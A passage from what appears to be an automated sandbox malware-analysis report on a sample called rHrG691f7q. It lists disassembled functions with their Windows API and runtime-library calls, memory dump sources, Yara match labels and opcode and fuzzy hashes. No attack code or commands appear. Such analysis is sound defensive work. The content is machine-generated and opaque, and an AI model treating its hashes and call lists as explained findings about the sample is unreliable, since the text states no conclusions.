                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,024EC4A4,E0830C40,?,?,?,?,?,?,024F425F,024CE03C,024EC4A4,?,024EC4A4,024EC4A4,024CE03C), ref: 024F3B2C
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 024F3BA7
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 024F3BC2
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,024EC4A4,00000001,?,00000005,00000000,00000000), ref: 024F3BE8
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C07
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,024CE03C,00000001,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C40
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                    • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                    • Instruction ID: 8770ec38e9b0aeb753cb32315334256fefbe27451603a83cc668d9e1a599ff44
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D51C575900289AFDB10CFA8D884AEEBBF4EF49704F14419FE655E7291D7309A81CB64
                                                                                                                                                                                                                                                                    Function 024E4AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024E4ACD
                                                                                                                                                                                                                                                                      • Part of subcall function 024E4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024E4800), ref: 024E4DAC
                                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024E4AE2
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4AF1
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E4AFF
                                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024E4B75
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4BB5
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E4BC3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3151764488-0
                                                                                                                                                                                                                                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                    • Instruction ID: 2ea8a0853e9e86f2de4b29290f49ad23bc5bce756762d402b32a1c8f3249b468
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C31B639A002149FDF04EF69C881B6E73B6FF44725F20456BD92697351DB70EA05CB94
                                                                                                                                                                                                                                                                    Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                    • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                                                                                                                                                                                    Function 024FFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                    • Instruction ID: e6ab7ff3c47bba42d778d37706de1a90f88c636105697c1691e707d1ea793f03
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0311B471604165BBEB612F778C48D6B7A9DFFC2B31B12066BFD16D7290DA308845CAB0
                                                                                                                                                                                                                                                                    Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A3D1
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                                                    Function 024FA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024FA331: _free.LIBCMT ref: 024FA35A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA638
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA643
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA64E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6A2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6AD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6B8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6C3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction ID: be180c3adb70505bde73375396f051b30b6fbbecdb948a331ced7e905a8ed422
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5211F171644B54AAEEB0BBB3CC45FCF7B9EDF84B00F40482EA39DAA150DAA5B5144E50
                                                                                                                                                                                                                                                                    Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                    • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                    • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                                                    Function 024D2659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D2667
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D266D
                                                                                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D269A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26A4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26B6
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D26CC
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D26DA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                    • Instruction ID: 26e38f2dac3e4023e2e5585a06d76b5f3be93a43b9b04ccd42e2cf5fe1bf0ba3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D01F73D500215A7DB20FF66EC18FAF3B78AF42F52B10043BF802D2161DBA4D9048AA8
                                                                                                                                                                                                                                                                    Function 024D24A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 024D2507
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                    • String ID: kernel32.dll
                                                                                                                                                                                                                                                                    • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                    • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                    • Instruction ID: ebd6521cd78994c65d6b730ff413855624693a4e360f8ace3d365fa691f2760a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F086759043103FB7117B757C6D91B3FADDD46A22320062BF811E2292EBB585418558
                                                                                                                                                                                                                                                                    Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                    • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                    • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                                                                                                                                                                                    Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 004311DD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 004311F6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431228
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431231
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043123D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4275183328-0
                                                                                                                                                                                                                                                                    • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                    • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                                                                                                                                                                                    Function 024F239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024F25EC,00000001,00000001,?), ref: 024F23F5
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024F25EC,00000001,00000001,?,?,?,?), ref: 024F247B
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024F2575
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 024F2582
                                                                                                                                                                                                                                                                      • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 024F258B
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 024F25B0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                    • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                    • Instruction ID: 0642dd2eb166db768a0b98625d43155c98bcc3e6c1f2041f0ae306150e7229b4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C251E472A00216ABEF65CF64CC60EBF77AAEB84754F15462EFE04DA240DBB4DD41CA50
                                                                                                                                                                                                                                                                    Function 024EE419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __cftoe
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                    • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                    • Instruction ID: 96b78b82e7906375045d5c8c788de5a7420c401cbafbab4d17b7c9cc150811c4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB51E972A00205ABFF249FA9CC40B6F77A9EF49376F10425FF91696291EB31D5018B64
                                                                                                                                                                                                                                                                    Function 024E302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024E3051
                                                                                                                                                                                                                                                                      • Part of subcall function 024D8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024D8ABD
                                                                                                                                                                                                                                                                    • SafeSQueue.LIBCONCRT ref: 024E306A
                                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 024E312A
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E314B
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E3159
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3496964030-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                                                    • Instruction ID: 669c6653efd94635fa2e009c93dcdd71215a4c799aca5a72e4c8ab8d0a16a8cd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
